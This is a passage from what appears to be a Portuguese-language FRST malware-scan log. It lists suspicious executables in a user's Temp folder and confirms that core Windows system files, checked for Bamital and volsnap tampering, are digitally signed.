C:\Users\Cliente NS\AppData\Local\Temp\cdo1866205296.dll C:\Users\Cliente NS\AppData\Local\Temp\cdo356208423.dll C:\Users\Cliente NS\AppData\Local\Temp\FBDD.tmp.exe C:\Users\Cliente NS\AppData\Local\Temp\fsdC715.exe C:\Users\Cliente NS\AppData\Local\Temp\GML29DI9ZY.exe C:\Users\Cliente NS\AppData\Local\Temp\I0NOGVEMUL.exe C:\Users\Cliente NS\AppData\Local\Temp\LightGate.exe C:\Users\Cliente NS\AppData\Local\Temp\ms9002.tmp.exe C:\Users\Cliente NS\AppData\Local\Temp\N0ZZWT7NFD.exe C:\Users\Cliente NS\AppData\Local\Temp\NOTEAZ3911.exe C:\Users\Cliente NS\AppData\Local\Temp\NPD70MNMCI.exe C:\Users\Cliente NS\AppData\Local\Temp\PN8GHKFZ2D.exe C:\Users\Cliente NS\AppData\Local\Temp\PriceFountainUpdateVer.exe C:\Users\Cliente NS\AppData\Local\Temp\set.exe C:\Users\Cliente NS\AppData\Local\Temp\SG4ODDZL0B.exe C:\Users\Cliente NS\AppData\Local\Temp\Uninstall.exe C:\Users\Cliente NS\AppData\Local\Temp\upgsvr.exe C:\Users\Cliente NS\AppData\Local\Temp\W5L2Z53E0Q.exe C:\Users\Cliente NS\AppData\Local\Temp\YeaPlayer_br_IBD_Bundle.exe C:\Users\Cliente NS\AppData\Local\Temp\YFK5SDLYBE.exe ==================== Bamital & volsnap ================= (Não há correção automática para arquivos que não passaram na verificação.) C:\Windows\explorer.exe => O arquivo é assinado digitalmente C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente C:\Windows\system32\services.exe => O arquivo é assinado digitalmente C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente